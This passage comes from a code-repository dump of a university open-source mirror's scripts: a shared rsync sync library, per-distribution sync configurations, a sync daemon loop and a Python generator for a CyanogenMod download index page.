\"$SIZE\" status syncing lastsync \"$LASTSYNC\" nextsync \"$NEXTSYNC\" name $1 > \"$STATUSROOT/$1.json\" 2>/dev/null\n\nif [[ ! 
-d \"$LOGROOT/$1\" ]]; then\n mkdir -p \"$LOGROOT/$1\"\nfi\n\nlogrotate() {\n for ((i=13; i>=0; i--)); do\n j=$((i+1))\n mv \"$LOGROOT/$1/log.stdout.$i\" \"$LOGROOT/$1/log.stdout.$j\" 2>/dev/null\n mv \"$LOGROOT/$1/log.stderr.$i\" \"$LOGROOT/$1/log.stderr.$j\" 2>/dev/null\n mv \"$LOGROOT/$1/log.outerr.$i\" \"$LOGROOT/$1/log.outerr.$j\" 2>/dev/null\n done\n cp \"$LOGROOT/$1/log.stdout\" \"$LOGROOT/$1/log.stdout.0\"\n cp \"$LOGROOT/$1/log.stderr\" \"$LOGROOT/$1/log.stderr.0\"\n cp \"$LOGROOT/$1/log.outerr\" \"$LOGROOT/$1/log.outerr.0\"\n}\n\nrm -f \"$LOGROOT/$1/log.stdout\"\nrm -f \"$LOGROOT/$1/log.stderr\"\nrm -f \"$LOGROOT/$1/log.outerr\"\n\ndate -u > \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\";\n\n_SAVELOG=1\n_sync > >(tee -a \"$LOGROOT/$1/log.outerr\" > \"$LOGROOT/$1/log.stdout\") 2> >(tee -a \"$LOGROOT/$1/log.outerr\" > \"$LOGROOT/$1/log.stderr\")\nRETVAL=$?\n\nif [[ \"$_SAVELOG\" == \"1\" ]]; then\n logrotate \"$1\";\nfi\n\nif [[ $RETVAL == 0 || $RETVAL == 23 ]]; then\n LASTSTATUS=success\n if [[ -f \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\" ]]; then\n rm \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\"\n fi\n SIZE=$(_get_size)\n NEXTSYNC=$(_get_next_sync_time)\n LASTSYNC=$(date +%s)\n python -c \"$GenJSON\" upstream \"$UPSTREAM\" size \"$SIZE\" status success lastsync \"$LASTSYNC\" nextsync \"$NEXTSYNC\" name $1 > \"$STATUSROOT/$1.json\" 2>/dev/null\n _post_sync > >(tee -a \"$LOGROOT/$1/log.outerr\" >> \"$LOGROOT/$1/log.stdout\" ) 2> >(tee -a \"$LOGROOT/$1/log.outerr\" >> \"$LOGROOT/$1/log.stderr\")\nelif [[ $RETVAL == 5 ]]; then\n LASTSTATUS=failed\n if [[ -f \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\" ]]; then\n rm \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\"\n fi\n NEXTSYNC=$(_get_next_sync_time)\n python -c \"$GenJSON\" upstream \"$UPSTREAM\" size \"$SIZE\" status success lastsync \"$LASTSYNC\" nextsync \"$NEXTSYNC\" name $1 > \"$STATUSROOT/$1.json\" 2>/dev/null\nelse\n LASTSTATUS=failed\n if [[ -f \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\" ]]; then\n rm \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\"\n fi\n NEXTSYNC=$(_get_next_sync_time)\n python -c \"$GenJSON\" upstream \"$UPSTREAM\" size \"$SIZE\" status failed lastsync \"$LASTSYNC\" nextsync \"$NEXTSYNC\" name $1 > \"$STATUSROOT/$1.json\" 2>/dev/null\nfi\n\n" }, { "alpha_fraction": 0.5013850331306458, "alphanum_fraction": 0.5146814584732056, "avg_line_length": 30.946903228759766, "blob_id": "2cff51a773f37684711df778e037c5c893b88db1", "content_id": "69213622389a385a3886eb3aa631d9421b5babd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3610, "license_type": "no_license", "max_line_length": 141, "num_lines": 113, "path": "/syncbin/.rsync_base", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This file should be source'd ***BEFORE*** anything in sync scripts!\n# \n# The following functions and variables can be overridden in order to support\n# different syncing requirements.\n\n_RSYNC_ARGS=\"-aHvh --delete --delete-delay --stats --safe-links --timeout=120 --contimeout=120 --delay-updates\"\n\n_check_updated() {\n set +x\n if [[ -n \"$_TIMESTAMP_PATHS\" ]]; then\n echo \"Checking timestamps...\"\n __TIMESTAMP_PATHS=$( echo \"$_TIMESTAMP_PATHS\" | tr ',' '\\n' )\n __PATHS_COUNT=$( echo \"$__TIMESTAMP_PATHS\" | wc -l )\n for ((i=1; i<=$__PATHS_COUNT; i++)); do\n _TIMESTAMP_PATH=$( echo \"$__TIMESTAMP_PATHS\" | sed -n 
\"${i}p\" )\n if [[ -n \"$_TIMESTAMP_PATH\" ]]; then\n _TIMESTAMP_PATH_LOCAL=$(echo \"$_TIMESTAMP_PATH\" | cut -d= -f2)\n _TIMESTAMP_PATH=$(echo \"$_TIMESTAMP_PATH\" | cut -d= -f1)\n if [[ -z \"$_TIMESTAMP_PATH_LOCAL\" ]]; then\n _TIMESTAMP_PATH_LOCAL=\"$_TIMESTAMP_PATH\"\n fi\n _TIMESTAMP_TEMP=$( mktemp \"/tmp/${_REPO}.XXXXX\" )\n rsync -q --timeout=20 --contimeout=20 --no-motd \"${_UPSTREAM%\\/}/${_TIMESTAMP_PATH#\\/}\" \"$_TIMESTAMP_TEMP\"\n local RETVAL=$?\n if [[ \"$RETVAL\" != \"0\" ]]; then\n echo \"Errors occurred ($RETVAL) while checking timestamp\"\n rm $_TIMESTAMP_TEMP\n set -x; return 1\n fi\n if cmp -s \"$MIRRORROOT/$_REPO/${_TIMESTAMP_PATH_LOCAL#\\/}\" \"$_TIMESTAMP_TEMP\"; then\n echo \"Remote ${_TIMESTAMP_PATH} is the same as local ${_TIMESTAMP_PATH_LOCAL}\"\n else\n echo \"Remote ${_TIMESTAMP_PATH} is different from local ${_TIMESTAMP_PATH_LOCAL}\"\n rm $_TIMESTAMP_TEMP\n set -x; return 1\n fi\n rm $_TIMESTAMP_TEMP\n fi\n done\n set -x; return 0\n fi\n set -x; return 1\n}\n\n_sync () {\n set +x\n mkdir -p $MIRRORROOT/$_REPO\n cd $MIRRORROOT/$_REPO\n if [[ $? != 0 ]]; then\n return 1\n fi\n if _check_updated; then\n echo \"Remote timestamp is the same as local timestamp.\"\n echo \"No actual sync will be performed.\"\n _SAVELOG=0\n return 0\n fi\n set -x\n rsync $_UPSTREAM . $_RSYNC_ARGS\n RETVAL=$?\n cd $OWD\n return $RETVAL\n}\n\n_post_sync () {\n return 0; # This is a stub\n}\n\n_get_upstream () {\n echo $_UPSTREAM\n}\n\n_upstream_inconsistent () {\n ls $MIRRORROOT/$_REPO/Archive-Update-in-Pro* &>/dev/null\n return $?\n}\n\n_get_next_sync_time () {\n _CURTIME=$(date +%s)\n _DELTA=$_SYNCEVERY\n if [[ \"$_DELTA\" -ge \"1800\" ]]; then\n _DELTA=$( echo $((_DELTA + RANDOM % 5400 - 3600)) 1800 | xargs python -c 'import sys;print max(int(sys.argv[1]), int(sys.argv[2]))' )\n fi\n if _upstream_inconsistent &>/dev/null; then\n _DELTA=$_FAILRETRY\n fi\n if [[ \"$LASTSTATUS\" == \"failed\" ]]; then\n OLD=$(kvdb_local_get failure_times)\n if [[ \"$?\" -gt \"0\" ]]; then\n OLD=0\n fi\n if [[ \"$OLD\" -lt \"$_FAILRETRIES\" ]]; then\n kvdb_local_set failure_times $((OLD+1))\n _DELTA=$_FAILRETRY\n else\n kvdb_local_set failure_times 0\n fi\n else\n kvdb_local_set failure_times 0\n fi\n echo $(( $_CURTIME + $_DELTA ))\n}\n\n_get_size () {\n _STDOUT=$LOGROOT/$_REPO/log.stdout\n if grep \"No actual sync will be performed\" $_STDOUT >/dev/null; then\n echo \"$SIZE\"\n else\n tail -n1 $_STDOUT | cut -d' ' -f4\n fi\n}\n" }, { "alpha_fraction": 0.7050691246986389, "alphanum_fraction": 0.7373272180557251, "avg_line_length": 18.727272033691406, "blob_id": "05521b59bcbc0af8d5acf76e391a955f52184d49", "content_id": "1904def039ab47c395642fad75a7f03cd98af803", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 217, "license_type": "no_license", "max_line_length": 42, "num_lines": 11, "path": "/syncbin/mariadb", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=mariadb\n_UPSTREAM=rsync://rsync.osuosl.org/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --partial\"\n_TIMESTAMP_PATHS=\"/TIME\"\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.7327935099601746, "avg_line_length": 18, "blob_id": "0d91fe0874acf522950c8496d7065d269f60d121", "content_id": "9b181409198c8ecd503212606302b70cd8ba194b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, 
"license_type": "no_license", "max_line_length": 61, "num_lines": 13, "path": "/syncbin/rpmfusion", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=rpmfusion\n_UPSTREAM=rsync://mirror1.hs-esslingen.de/$_REPO/\n_SYNCEVERY=14400\n_FAILRETRY=600\n_FAILRETRIES=4\n\n_post_sync () {\n $SCRIPTROOT/report_mirror -c \"$SCRIPTROOT/rpmfusion.conf\"\n}\n" }, { "alpha_fraction": 0.7340824007987976, "alphanum_fraction": 0.7640449404716492, "avg_line_length": 23.272727966308594, "blob_id": "5741c523a565425a5c7dd9d824ecd0f36668a4f8", "content_id": "d7649ebb6cedfb796287d0eb3439d5fcc9cb9c16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 267, "license_type": "no_license", "max_line_length": 56, "num_lines": 11, "path": "/syncbin/kali", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=kali\n_UPSTREAM=rsync://kali.mirror.garr.it/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_UPSTREAM_HTTP=http://kali.mirror.garr.it/mirrors/kali\n_TIMESTAMP_PATHS=\"/project/trace/mirror3.mirror.garr.it\"\n" }, { "alpha_fraction": 0.5898959636688232, "alphanum_fraction": 0.6114413142204285, "avg_line_length": 28.91111183166504, "blob_id": "6588acb215e0e9d251c6d9280b4348e3875c3e02", "content_id": "a8bd4f8b682e463e16aa6d7a3088ccb63c44a598", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1346, "license_type": "no_license", "max_line_length": 139, "num_lines": 45, "path": "/sync_daemon", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncd $(dirname $0)\nexport CWD=$(pwd)\nexport OWD=$(pwd)\nexport MIRRORROOT=/home/mirror/mirrordata\nexport LOGROOT=/home/mirror/mirrorlog\nexport STATUSROOT=/home/mirror/mirrorweb/status/\nexport WEBROOT=/home/mirror/mirrorweb\nexport SCRIPTROOT=/home/mirror/scripts\nexport KVDBROOT=/home/mirror/statuskv\nexport DISTRO=$1\n\nmkdir -p \"$MIRRORROOT/$1\"\nmkdir -p \"$LOGROOT/$1\"\n\nNOW=$(date +%s)\nNEXT=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"nextsync\" in p and p[\"nextsync\"] or -1')\nif [[ \"$NEXT\" -ge \"$NOW\" ]]; then\n WAIT=$((NEXT-NOW))\n sleep $WAIT\nfi\n\nwhile true; do\n# for ((i=13;i>=0;i--)); do \n# j=$((i+1))\n# mv \"$LOGROOT/$1/sync_core.log.$i\" \"$LOGROOT/$1/sync_core.log.$j\"\n# done\n# mv \"$LOGROOT/$1/sync_core.log\" \"$LOGROOT/$1/sync_core.log.0\"\n# bash -x ./sync_core $1 >& \"$LOGROOT/$1/sync_core.log\"\n bash -x ./sync_core $1 2>&1\n if [[ $? != 0 ]]; then\n echo \"($1) CORE CORRUPTION DETECTED!!! 
SLEEPING 60 SECONDS...\"\n sleep 60\n continue\n fi\n NEXTSYNC=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"nextsync\" in p and p[\"nextsync\"] or -1')\n NOW=`date +%s`\n SLEEPTIME=$((NEXTSYNC-NOW))\n if [[ \"$SLEEPTIME\" -le \"0\" ]]; then\n continue\n else\n sleep \"$SLEEPTIME\"\n fi\ndone\n" }, { "alpha_fraction": 0.5486546158790588, "alphanum_fraction": 0.5650702118873596, "avg_line_length": 32.95977020263672, "blob_id": "f2791478932a7b7cf045a139684a73e689d26828", "content_id": "e9ac1b0137ca69559c0e32cd84a7098e2b648bc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5909, "license_type": "no_license", "max_line_length": 478, "num_lines": 174, "path": "/cm_dir_index", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport re\nimport subprocess\n\nHEADER=\"\"\"\n<!doctype html>\n<html>\n\t<head>\n\t\t<meta charset=\"UTF-8\">\n\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n\t\t<title data-localize=\"title\">CyanogenMod Directory Index - HUST Open Source Mirrors</title>\n\t\t<link href=\"/assets/css/bootstrap.min.css\" rel=\"stylesheet\"/>\n\t\t<style type=\"text/css\">\n\t\t\thtml,\n\t\t\tbody {\n\t\t\t\theight: 100%;\n\t\t\t}\n\t\t\t.container,\n\t\t\t.navbar-fixed-top .container{\n\t\t\t\twidth: 80%;\n\t\t\t}\n\t\t\t.container .credit {\n\t\t\t\tmargin: 13px 0;\n\t\t\t}\n\t\t\t.centerblock {\n\t\t\t\ttext-align: center;\n\t\t\t}\n\t\t\t#wrap {\n\t\t\t\tmin-height: 100%;\n\t\t\t\theight: auto !important;\n\t\t\t\theight: 100%;\n\t\t\t\tmargin: 0 auto -80px;\n\t\t\t}\n\t\t\t#push,\n\t\t\t#footer {\n\t\t\t\theight: 80px;\n\t\t\t}\n\t\t\t#footer {\n\t\t\t\tbackground-color: #f5f5f5;\n\t\t\t}\n\t\t\t#wrap > .container {\n\t\t\t\tpadding-top: 60px;\n\t\t\t}\n\t\t</style>\n\t</head>\n\t<body>\n\t\t<div id=\"wrap\">\n\t\t\t<div class=\"navbar navbar-fixed-top navbar-inverse\">\n\t\t\t\t<div class=\"navbar-inner\">\n\t\t\t\t\t<div class=\"container\">\n\t\t\t\t\t\t<a class=\"brand\" href=\"/\" data-localize=\"main-name\">HUST Open Source Mirrors</a>\n\t\t\t\t\t\t<ul class=\"nav\">\n\t\t\t\t\t\t\t<li><a href=\"/\" data-localize=\"nav.home\">Home</a></li>\n\t\t\t\t\t\t\t<li><a href=\"/help\" data-localize=\"nav.help\">Help</a></li>\n\t\t\t\t\t\t\t<li><a href=\"/graph\" data-localize=\"nav.graph\">Graph</a></li>\n\t\t\t\t\t\t</ul>\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t<div class=\"container\">\n\t\t\t\t<div class=\"centerblock\">\n\t\t\t\t\t<h1 data-localize=\"title\">CyanogenMod Directory Index</h1>\n\t\t\t\t\t<p class=\"lead\">Tip: Use Ctrl-F to search for your device.</p>\n\"\"\"\nTABLE_HEADER=\"\"\"\n\t\t\t\t\t<table class=\"table\">\n\t\t\t\t\t\t<tr><th>Build type</th><th>File name</th><th>CM Version</th><th>Device codename</th></tr>\n\"\"\"\nTABLE_FOOTER = \"\"\"\n\t\t\t\t\t</table>\"\"\"\n\nFOOTER=\"\"\"\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t<div id=\"push\"></div>\n\t\t</div>\n\t\t<div id=\"footer\">\n\t\t\t<div class=\"container centerblock\">\n\t\t\t\t<p class=\"muted credit\" data-localize=\"credit\">This site is brought to you by <a href=\"http://qiming.hust.edu.cn/\" target=\"qiming\">Qiming College, HUST</a> and <a href=\"http://www.hustunique.com/\" target=\"_blank\">Unique Studio</a>.</p>\n\t\t\t\t<p class=\"muted credit\" data-localize=\"contact\">Contact us at <a 
href=\"http://www.google.com/recaptcha/mailhide/d?k=01h7Er0RVnO4wvIFgIk2lR-g==&c=-7_mZ8fYpJyWgM9qxj57zKaij5zJpRkBUBNpq2619zs=\" target=\"_blank\" onclick=\"window.open('http://www.google.com/recaptcha/mailhide/d?k=01h7Er0RVnO4wvIFgIk2lR-g==&c=-7_mZ8fYpJyWgM9qxj57zKaij5zJpRkBUBNpq2619zs=', '', 'toolbar=0,scroolbars=0,location=0,menubar=0,resizable=0,width=500,height=300');return false;\">our email address</a></p>\n\t\t\t</div>\n\t\t</div>\n\t\t<script src=\"/assets/js/jquery.min.js\" type=\"text/javascript\"></script>\n\t\t<script src=\"/assets/js/jquery.localize.js\" type=\"text/javascript\"></script>\n\t\t<script type=\"text/javascript\">\n\t\tl10nopts = {\n\t\t\tskipLanguage: [\"en\", \"en-US\"],\n\t\t\tpathPrefix: \"/l10n\"\n\t\t};\n\t\t$('[data-localize]').localize('cmindex', l10nopts);\n\t\t</script>\n\t</body>\n</html>\n<!-- Written by Qijiang Fan and Haochen Tong in Vim -->\n<!-- IT Service Team @ Unique Studio -->\n\"\"\"\n\nCMROOT=\"/home/mirror/mirrordata/cm/\"\n\ndef parse_filename(f):\n info = {'cmver': '???', 'device': '???', 'name':'', 'path':'', 'type': 'Stable', 'changelog': ''}\n r = f.split('/')[-1][:-4]\n d = r\n if r.endswith('-signed'):\n r = r[:-7]\n if r.startswith('update-'):\n r = r[7:]\n info['path'] = f\n info['name'] = d\n info['changelog'] = '/'.join(f.split('/')[:-1]) + \"/CHANGES.txt\"\n fields = r.split('-')[1:]\n for i in range(len(fields)):\n if i == 0:\n info['cmver'] = fields[i]\n elif i == 1:\n if re.match(r\"\\d{8}\", fields[i]):\n continue\n elif re.match(r\"RC\\d+\", fields[i]):\n info['cmver'] += '-' + fields[i]\n info['type'] = \"RC\"\n else:\n info['device'] = fields[i]\n elif i == 2:\n if fields[i] == \"NIGHTLY\" or fields[i] == \"SNAPSHOT\":\n info['type'] = \"Nightly\"\n elif fields[i] == \"EXPERIMENTAL\":\n info['type'] = \"Experimental\"\n else:\n info['device'] = fields[i]\n elif i == 3:\n info['device'] = fields[i]\n else:\n break # stop searching\n\n return info\n\n\ndef generate_most_recent(files, count):\n output = open(CMROOT + \"index.html\", \"w\")\n output.write(HEADER)\n output.write('<p class=\"lead\">Only the most recent 60 builds are shown. 
See <a href=\"all.html\">full list</a> here.</p>\\n')\n output.write(TABLE_HEADER)\n i = 0\n for f in files:\n if i > count:\n break\n info = parse_filename(f)\n output.write('<tr><td>%s</td><td><a href=\"/cm%s\">%s</a> (<a href=\"/cm%s\">ChangeLog</a>)</td><td>%s</td><td>%s</td></tr>\\n' %\n (info['type'], info['path'], info['name'], info['changelog'], info['cmver'], info['device']))\n i += 1\n\n output.write(TABLE_FOOTER + FOOTER)\n output.close()\n\n\ndef generate_directory_index(files):\n output = open(CMROOT + \"all.html\", \"w\")\n output.write(HEADER + TABLE_HEADER)\n result = subprocess.check_output(r\"find \" + CMROOT + \" -name '*.zip' -type f -printf '%T@ %p\\n' | sort -k 1nr | sed -e 's/^[^ ]* //' -e 's#\" + CMROOT + \"##'\", shell=True)\n for f in files:\n info = parse_filename(f)\n output.write('<tr><td>%s</td><td><a href=\"/cm%s\">%s</a></td><td>%s</td><td>%s</td></tr>\\n' %\n (info['type'], info['path'], info['name'], info['cmver'], info['device']))\n\n output.write(TABLE_FOOTER + FOOTER)\n output.close()\n\nif __name__ == '__main__':\n cmd = r\"find %s/jenkins %s/jenkins-test -name '*.zip' -type f -printf '%%T@ %%p\\n' | sort -k 1nr | sed -e 's/^[^ ]* //' -e 's#%s##'\" % (CMROOT, CMROOT, CMROOT)\n result = subprocess.check_output(cmd, shell=True)\n files = result.strip().split('\\n')\n generate_most_recent(files, 60)\n generate_directory_index(files)\n" }, { "alpha_fraction": 0.7658730149269104, "alphanum_fraction": 0.7658730149269104, "avg_line_length": 30.5, "blob_id": "9fd743dc0b4a3f953cea4db79d10a99b3f380892", "content_id": "d78221acc27d2eeebe570c7bd975311c5462118a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 252, "license_type": "no_license", "max_line_length": 70, "num_lines": 8, "path": "/pypi-update-stats", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This command should be run as root because nginx logs are not\n# readable by mirror. 
This should be fixed.\n/usr/local/bin/bandersnatch update-stats\n\n# Fix permissions\nchown mirror:mirror -R \"/home/mirror/mirrordata/pypi/web/local-stats/\"\n" }, { "alpha_fraction": 0.695364236831665, "alphanum_fraction": 0.7549669146537781, "avg_line_length": 15.777777671813965, "blob_id": "f138933c74ae8bab6f4abf71bc153ec3ee86c4c7", "content_id": "afe4cfd59772a2c736abd4576fb2315aaa7d6299", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 151, "license_type": "no_license", "max_line_length": 39, "num_lines": 9, "path": "/syncbin/CTAN", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=CTAN\n_UPSTREAM=rsync://rsync.tex.ac.uk/CTAN/\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n" }, { "alpha_fraction": 0.6148694157600403, "alphanum_fraction": 0.6376423239707947, "avg_line_length": 39.32432556152344, "blob_id": "3137a503f3a86bdbe895635193a63e113ec7169d", "content_id": "9ad654ab9f2e35b365db5d7e6ec54c50896f101a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 199, "num_lines": 37, "path": "/syncbin/debian", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=debian\n__UPSTREAM=ftp2.de.debian.org # for use with trace\n_UPSTREAM=rsync://$__UPSTREAM/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/project/trace/ftp.halifax.rwth-aachen.de\"\n\n_sync () {\n mkdir -p $MIRRORROOT/$_REPO\n cd $MIRRORROOT/$_REPO\n if _check_updated; then\n echo \"Remote timestamp is the same as local timestamp.\"\n echo \"No actual sync will be performed.\"\n return 0\n fi\n rsync $_UPSTREAM . -aHvh --exclude Packages* --exclude Sources* --exclude Release* --exclude InRelease --exclude i18n/* --exclude ls-lR* --links --safe-links --stats --hard-links --delay-updates\n RETVAL=$?\n if [ \"$RETVAL\" -eq \"0\" ]; then\n rsync $_UPSTREAM . 
-aHvh --delete --delete-delay --links --safe-links --stats --times --hard-links --delay-updates\n RETVAL=$?\n if [ \"$RETVAL\" -eq \"0\" ]; then\n if [ -d project/trace ] ; then\n date -u > project/trace/mirrors.hustunique.com\n echo 'Running on host: mirrors.hustunique.com' >> project/trace/mirrors.hustunique.com\n echo 'Architectures: GUESSED:{ source amd64 armel armhf hurd-i386 i386 ia64 kfreebsd-amd64 kfreebsd-i386 mips mipsel powerpc s390 s390x sparc}' >> project/trace/mirrors.hustunique.com\n echo \"Upstream-mirror: $__UPSTREAM\" >> project/trace/mirrors.hustunique.com\n fi\n fi\n fi\n cd $OWD\n return $RETVAL\n}\n\n" }, { "alpha_fraction": 0.7195122241973877, "alphanum_fraction": 0.7743902206420898, "avg_line_length": 17.11111068725586, "blob_id": "3d1335311c0c3326945bf86264abd98decff8726", "content_id": "55b4812d9a0f74f50192881eaea6c6fd6444cea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 164, "license_type": "no_license", "max_line_length": 47, "num_lines": 9, "path": "/syncbin/raspbian", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=raspbian\n_UPSTREAM=rsync://archive.raspbian.org/archive/\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7289156913757324, "alphanum_fraction": 0.7771084308624268, "avg_line_length": 17.44444465637207, "blob_id": "3ad3087015e9c26a9a7cfbe0d34714501a3ea176", "content_id": "6054f1c6bdedd2417e93939c34f4faf2a3458dfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 166, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/syncbin/deepin-cd", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=deepin-cd\n_UPSTREAM=rsync://cdimage.linuxdeepin.com/cdimage/\n_SYNCEVERY=7200\n_FAILRETRY=600\n_FAILRETRIES=3\n" }, { "alpha_fraction": 0.7438596487045288, "alphanum_fraction": 0.7719298005104065, "avg_line_length": 24.909090042114258, "blob_id": "f246c45dba0e3610a819030985ddf2ae5390e086", "content_id": "3b3afe341aaf5fbf2a9b0881dd702a352ecf7bc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 285, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/syncbin/kali-security", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=kali-security\n_UPSTREAM=rsync://kali.mirror.garr.it/$_REPO/\n_SYNCEVERY=120\n_FAILRETRY=120\n_FAILRETRIES=4\n_UPSTREAM_HTTP=http://kali.mirror.garr.it/mirrors/kali-security\n_TIMESTAMP_PATHS=\"/project/trace/mirror3.mirror.garr.it\"\n" }, { "alpha_fraction": 0.6894409656524658, "alphanum_fraction": 0.7453415989875793, "avg_line_length": 16.77777862548828, "blob_id": "cc46b555cadcd2231c5e329cb5a8e139ace23eb2", "content_id": "7d466cb11149e34c91defe3e25faa80932e9b31d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 161, "license_type": "no_license", "max_line_length": 44, "num_lines": 9, "path": "/syncbin/debian-cd", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=debian-cd\n_UPSTREAM=rsync://ftp2.jp.debian.org/$_REPO/\n_SYNCEVERY=3600\n_FAILRETRY=600\n_FAILRETRIES=3\n\n" }, 
{ "alpha_fraction": 0.7376237511634827, "alphanum_fraction": 0.7722772359848022, "avg_line_length": 19.200000762939453, "blob_id": "31bec86e59e4b0819eaea09597464f05e3de10bc", "content_id": "93ff84cbb95be7918ccf80f719ff80b8c20a3e7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 202, "license_type": "no_license", "max_line_length": 49, "num_lines": 10, "path": "/syncbin/sagemath", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=sagemath\n_UPSTREAM=rsync://boxen.math.washington.edu/sage/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/zzz/timestamp.html\"\n" }, { "alpha_fraction": 0.721030056476593, "alphanum_fraction": 0.7639485001564026, "avg_line_length": 22.299999237060547, "blob_id": "7454ea525b7d10d1c4feee355948ea2eddb58fb5", "content_id": "f36c1d3313714cc09d046815d50d41e87149ac2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 233, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/syncbin/archlinuxarm", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=archlinuxarm\n_UPSTREAM=rsync://ftp2.de.debian.org/archlinux-arm/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/os/sync,/armv7h/sync,/armv6h/sync,/arm/sync\"\n" }, { "alpha_fraction": 0.565891444683075, "alphanum_fraction": 0.5865632891654968, "avg_line_length": 20.5, "blob_id": "482a0cd42b950fd6bcdb97a9247f6ff040897253", "content_id": "bf8e4dd1c551c97319dc29fb57a595d899866be7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 774, "license_type": "no_license", "max_line_length": 85, "num_lines": 36, "path": "/syncbin/linux-git", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=linux-git\n__REPO=linux.git\n_UPSTREAM=https://kernel.googlesource.com/pub/scm/linux/kernel/git/torvalds/linux.git\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n\n_sync () {\n mkdir -p $MIRRORROOT/$__REPO\n cd $MIRRORROOT/$__REPO\n git remote -v update\n RETVAL=$?\n cd $OWD\n return $RETVAL\n}\n\n_get_size() {\n OLD=$(kvdb_local_get last_du_time)\n if [ \"0$OLD\" -eq \"0\" ]; 